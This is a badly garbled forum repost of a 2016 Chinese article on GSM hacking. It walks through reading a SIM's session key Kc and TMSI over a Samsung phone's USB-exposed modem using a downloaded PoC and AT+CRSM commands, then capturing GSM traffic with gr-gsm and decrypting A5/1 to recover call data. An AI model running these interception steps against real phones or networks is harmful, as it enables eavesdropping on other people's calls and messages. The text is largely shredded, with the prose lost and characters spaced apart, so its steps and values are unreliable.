搜索

[10427] 2016-08-25_GSMHackingPart②:使用SDR捕获GSM网络数据并解密

文档创建者:s7ckTeam
浏览次数:2
最后更新:2025-01-18
2016-08-25_GSMHackingPart②:使用SDR捕获GSM网络数据并解密 G S M   H a c k i n g   P a r t   使 S D R G S M 0 x r o o t   F r e e B u f   2 0 1 6 - 0 8 - 2 5 0 x r o o t @ 0 × 0 0   G S M   H a c k i n g   P a r t     使 S D R G S M G S M 0 × 0 1
1 . 1   M o d e m   i n t e r f a c e   e x p o s e d   v i a   U S B e x p A T G a l a x y   N o t e   3 G a l a x y   S 4 G a l a x y   S 5 G a l a x y   S 6 A T   A t t e n t i o n , A T P C 1 . 2   l i b u s b 1 . 3   g c c P o C : 0 × 0 2   K c T M S I / d e v / t t y A C M * 2 . 1   s w i t c h e r w g e t   h t t p s : / / r a w . g i t h u b u s e r c o n t e n t . c o m / u d 2 / a d v i s o r i e s / m a s t e r / a n d r o i d / s a m s u n g / n o c v e - 2 0 1 6 - 0 0 0 4 / u s b s w i t c h e r . c w g e t   h t t p : / / j a i s t . d l . s o u r c e f o r g e . n e t / p r o j e c t / l i b u s b / l i b u s b - 0 . 1 % 2 0 % 2 8 L E G A C Y % 2 9 / 0 . 1 . 1 2 / l i b u s b - 0 . 1 . 1 2 . t a r . g z t a r   z x v f   l i b u s b - 0 . 1 . 1 2 . t a r . g z c d   l i b u s b - 0 . 1 . 1 2 / . / c o n f i g u r e m a k e m a k e   i n s t a l l s u d o   l d c o n f i g g c c   u s b s w i t c h e r . c   - o   s w i t c h e r   - l u s b b u s y b o x   m i c r o c o m   / d e v / t t y A C M 0
使 m i n i c o m 2 . 2   m i n i c o m A T K c T M S I A t t a c k i n g   t h e   B a s e b a n d   M o d e m   o f   M o b i l e   P h o n e s   t o   B r e a c h   t h e   u s e r s   P r i v a c y   a n d   n e t w o r k   S e c u r i t y . / s w i t c h e r m i n i c o m   - D   / d e v / t t y A C M 0
2 . 3   K c G S M 线 B T S M S S R E S ( A 8 ) K c M S C / V L R B T S M S 使 K c M S K c T D A M M A 5 线 B T S 线 T D M A K c A 5 B S C M S C A T K C C r a z y   D a n i s h   H a c k e r 5 9 7 3 2 3 7 C 3 E 9 6 9 8 0 3 0 3   5 9 7 3 2 3 7 C 3 E 9 6 9 8 0 3 2 . 4   T M S I   线 ( I M S I ) ( T M S I ) M S C / V L R S I M 寿 T M S I A T C r a z y   D a n i s h   H a c k e r 9 0 6 2 F F 7 6 3 2 F 8 6 6 5 6 1 0 F F 0 0 4 b y t e s , 8 9 0 6 2 F F 7 6 0 × 0 3   3 . 1   G S M A R F C N 2 G A T + C R S M = 1 7 6 . 2 8 4 4 8 , 0 , 0 , 9 A T + C R S M = 1 7 6 . 2 8 5 4 2 , 0 , 0 , 1 1 * # * # 4 6 3 6 # * # *    
M C C M N C A R F C N M C C   M N C   M o b i l e   N e t w o r k   C o d e 2 G S M 使 0 1 G S M 使 0 2 A R F C N   线 A b s o l u t e   R a d i o   F r e q u e n c y   C h a n n e l   N u m b e r     A R F C N   G S M 线 广 B C C H 广 B C C H F C C H 使 M S G S M G S M S C H B T S T D M A 使 使 B C C H R A C H S I M A G C H 使 G S M G S M S D C C H S D C C H S A C C H B C C H C C C H P a r t   1   9 3 7 . 4 M H z A R F C N 1 2 S D R 3 . 2   h t t p : / / w w w . c e l l m a p p e r . n e t / a r f c n . p h p S a m s u n g   ( A n d r o i d )   :   * # * # 1 9 7 3 2 8 6 4 0 # * # *   o r   * # 0 0 1 1 # i P h o n e   ( a l l )   :   * 3 0 0 1 # 1 2 3 4 5 # * H T C   ( A n d r o i d )   :   * # * # 7 2 6 2 6 2 6 # * # *
D o w n l i n k   F r e q u e n c y     ( b a s e   s t a t i o n   t o   p h o n e )     9 3 7 . 4   M H z   9 3 7 4 0 0 0 0 0 3 . 3 N e t w o r k   T y p e         G S M   ( T D M A ) E / U / A R F C N         1 2 B a n d   N a m e         G S M - 9 0 0 U p l i n k   F r e q u e n c y     ( p h o n e   t o   b a s e   s t a t i o n )         8 9 2 . 4   M H z D o w n l i n k   F r e q u e n c y       ( b a s e   s t a t i o n   t o   p h o n e )         9 3 7 . 4   M H z B a n d   N u m b e r         9 0 0 g r g s m _ c a p t u r e . p y   - h l i n u x ;   G N U   C + +   v e r s i o n   4 . 8 . 4 ;   B o o s t _ 1 0 5 4 0 0 ;   U H D _ 0 0 3 . 0 1 0 . g i t - 1 9 7 - g 0 5 3 1 1 1 d c U s a g e :   g r g s m _ c a p t u r e . p y   [ o p t i o n s ] R T L - S D R   c a p t u r i n g   a p p   o f   g r - g s m . O p t i o n s :     - h ,   - - h e l p                         s h o w   t h i s   h e l p   m e s s a g e   a n d   e x i t   / /     - f   F C ,   - - f c = F C                 S e t   f r e q u e n c y   [ d e f a u l t = n o n e ]   / /                                                 h a v e   t o   p r o v i d e   t h e   G S M   b a n d   a l s o     - g   G A I N ,   - - g a i n = G A I N     S e t   g a i n   [ d e f a u l t = 3 0 ]   / / g a i n     - s   S A M P _ R A T E ,   - - s a m p - r a t e = S A M P _ R A T E     / /   2 M     - p   P P M ,   - - p p m = P P M           S e t   p p m   [ d e f a u l t = 0 ]     - b   B U R S T _ F I L E ,   - - b u r s t - f i l e = B U R S T _ F I L E                                                     - c   C F I L E ,   - - c f i l e = C F I L E                                                 F i l e   w h e r e   t h e   c a p t u r e d   d a t a   a r e   s a v e d     - - b a n d = B A N D                       S p e c i f y   t h e   G S M   b a n d   f o r   t h e   f r e q u e n c y .   A v a i l a b l e                                                 b a n d s   a r e :                                                   G S M 4 5 0 ,   G S M 4 8 0 ,   G S M 8 5 0 .   I f   n o   b a n d   i s   s p e c i f i e d ,   i t                                                 w i l l   b e   d e t e r m i n e d   a u t o m a t i c a l l y ,   d e f a u l t i n g   t o   0 .     - - a r g s = A R G S                       S e t   d e v i c e   a r g u m e n t s   [ d e f a u l t = ] g r g s m _ c a p t u r e . p y   - g   4 0   - a   1 2   - s   1 0 0 0 0 0 0   - c   s m s . c f i l e   - T   2 0 - g   g a i n   4 0 - a   A R F C N   1 2 - s   1 M - c   s m s . c f i l e - T  
A R F C N   1 2 K C T M S I 0 × 0 4   K C   T M S I 4 . 1   K C : 5 9 7 3 2 3 7 C 3 E 9 6 9 8 0 3 0 3   5 9 7 3 2 3 7 C 3 E 9 6 9 8 0 3 4 . 2   T M S I : 9 0 6 2 F F 7 6 3 2 F 8 6 6 5 6 1 0 F F 0 0   8 9 0 6 2 F F 7 6 d e c o d e   u s a g e l s   - l a h   s m s . c f i l e m i n i c o m   - D   / d e v / t t y A C M 0 A T + C R S M = 1 7 6 . 2 8 4 4 8 , 0 , 0 , 9 A T + C R S M = 1 7 6 . 2 8 5 4 2 , 0 , 0 , 1 1 l s   - l a h   v o i c e . c f i l e
g r - g s m h t t p s : / / g i t h u b . c o m / p t r k r y s i k / t e s t _ d a t a I m m e d i a t e   A s s i g n m e n t 广 H C C H   S D C C H T i m e s l o t : 1 g r g s m _ d e c o d e   - h U s a g e :   g r g s m _ d e c o d e :   [ o p t i o n s ] O p t i o n s :     - h ,   - - h e l p                         s h o w   t h i s   h e l p   m e s s a g e   a n d   e x i t   / /     - m   C H A N _ M O D E ,   - - m o d e = C H A N _ M O D E                                                 C h a n n e l   m o d e .   V a l i d   o p t i o n s   a r e   ' B C C H '   ( N o n - c o m b i n e d                                                 C 0 ) ,   ' B C C H _ S D C C H 4 ' ( C o m b i n e d   C 0 ) ,   ' S D C C H 8 '   ( S t a n d - a l o n e                                                 c o n t r o l   c h a n n e l )   a n d   ' T C H F '   ( T r a f f i c   C h a n n e l ,   F u l l                                                 r a t e )     - t   T I M E S L O T ,   - - t i m e s l o t = T I M E S L O T                                                 T i m e s l o t   t o   d e c o d e   [ d e f a u l t = 0 ]     - u   S U B S L O T ,   - - s u b s l o t = S U B S L O T                                                 S u b s l o t   t o   d e c o d e .   U s e   i n   c o m b i n a t i o n   w i t h   c h a n n e l                                                 t y p e   B C C H _ S D C C H 4   a n d   S D C C H 8     - b   B U R S T _ F I L E ,   - - b u r s t - f i l e = B U R S T _ F I L E                                                 I n p u t   f i l e   ( b u r s t s )     - c   C F I L E ,   - - c f i l e = C F I L E                                                 I n p u t   f i l e   ( c f i l e )     - v ,   - - v e r b o s e                   I f   s e t ,   t h e   d e c o d e d   m e s s a g e s   ( w i t h   f r a m e   n u m b e r   a n d                                                 c o u n t )   a r e     - p ,   - - p r i n t - b u r s t s         I f   s e t ,   t h e   r a w   b u r s t s   ( w i t h   f r a m e   n u m b e r   a n d   c o u n t )                                                 a r e   p r i n t e d       C f i l e   O p t i o n s :         O p t i o n s   f o r   d e c o d i n g   c f i l e   i n p u t .         - f   F C ,   - - f c = F C             F r e q u e n c y   o f   c f i l e   c a p t u r e     / /           - a   A R F C N ,                                                   h a v e   t o   p r o v i d e   t h e   G S M   b a n d   a l s o         - - b a n d = B A N D                   S p e c i f y   t h e   G S M   b a n d   f o r   t h e   f r e q u e n c y .   A v a i l a b l e                                                 b a n d s   a r e :                                                   G S M 4 5 0 ,   G S M 4 8 0 ,   G S M 8 5 0 . I f   n o   b a n d   i s   s p e c i f i e d ,   i t                                                 w i l l   b e   d e t e r m i n e d   a u t o m a t i c a l l y ,   d e f a u l t i n g   t o   0 .         - s   S A M P _ R A T E ,   - - s a m p - r a t e = S A M P _ R A T E       / / 1 M         - - p p m = P P M                       S e t   f r e q u e n c y   o f f s e t   c o r r e c t i o n   [ d e f a u l t = 0 ]     D e c r y p t i o n   O p t i o n s :         O p t i o n s   f o r   s e t t i n g   t h e   A 5   d e c r y p t i o n   p a r a m e t e r s .         - e   A 5 ,   - - a 5 = A 5             A 5   v e r s i o n   [ d e f a u l t = 1 ] .   A 5   v e r s i o n s   1   -   3   s u p p o r t e d   / / A 5         - k   K C ,   - - k c = K C             A 5   s e s s i o n   k e y   K c .   V a l i d   f o r m a t s   a r e   / / K C         O p t i o n s   f o r   s e t t i n g   T r a f f i c   c h a n n e l   d e c o d i n g   p a r a m e t e r s .         - d   S P E E C H _ C O D E C ,   - - s p e e c h - c o d e c = S P E E C H _ C O D E C                                                 T C H - F   s p e e c h   c o d e c   [ d e f a u l t = F R ] .   V a l i d   o p t i o n s                                                   E F R ,   A M R 1 2 . 2 ,   A M R 1 0 . 2 ,   A M R 7 . 9 5 ,   A M R 7 . 4 ,   A M R 6 . 7 ,                                                 A M R 5 . 9 ,   A M R 5 . 1 5 ,   A M R 4 . 7 5         - o   S P E E C H _ O U T P U T _ F I L E ,   - - o u t p u t - t c h = S P E E C H _ O U T P U T _ F I L E   / / A R F C N : 7 2 5   $ ( ( 1 0 0 0 0 0 0 0 0 / 1 7 4 ) ) K c : 0 x 1 E , 0 x F 0 , 0 x 0 B , 0 x A B , 0 x 3 B , 0 x A C , 0 x 7 0 , 0 x 0 2 w g e t   h t t p s : / / g i t h u b . c o m / p t r k r y s i k / t e s t _ d a t a / r a w / m a s t e r / v f _ c a l l 6 _ a 7 2 5 _ d 1 7 4 _ g 5 _ K c 1 E F 0 0 B A B 3 B A C 7 0 0 2 . c f i l e m v   v f _ c a l l 6 _ a 7 2 5 _ d 1 7 4 _ g 5 _ K c 1 E F 0 0 B A B 3 B A C 7 0 0 2 . c f i l e   t e s t . c f i l e s u d o   w i r e s h a r k   - i   l o g r g s m _ d e c o d e   - a   7 2 5   - s   $ ( ( 1 0 0 0 0 0 0 0 0 / 1 7 4 ) )   - m   B C C H   - t   0   - c   t e s t . c f i l e
使 C i p h e r i n g   M o d e   C o m m a n d A 5 : A 5 1 9 8 9 G S M A 5 A 5 / 1 A 5 / 2 A 5 / 3 A 5 A 5 / 1 g r g s m _ d e c o d e   - a   7 2 5   - s   $ ( ( 1 0 0 0 0 0 0 0 0 / 1 7 4 ) )   - c   t e s t . c f i l e   - m   S D C C H 8   - t   1
c c   S e t u p C a l l i n g   p a r t y   B C D   n u m b e r     C a l l i n g   p a r t y   n u m b e r ( ) : A s s i g n m e n t   C o m m a n d g r g s m _ d e c o d e   - a   7 2 5   - s   $ ( ( 1 0 0 0 0 0 0 0 0 / 1 7 4 ) )   - c   t e s t . c f i l e   - m   S D C C H 8   - t   1   - e   1   - k   0 x 1 E , 0 x F 0 , 0 x 0 B , 0 x A B , 0 x 3 B , 0 x A C , 0 x 7 0 , 0 x 0 2
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理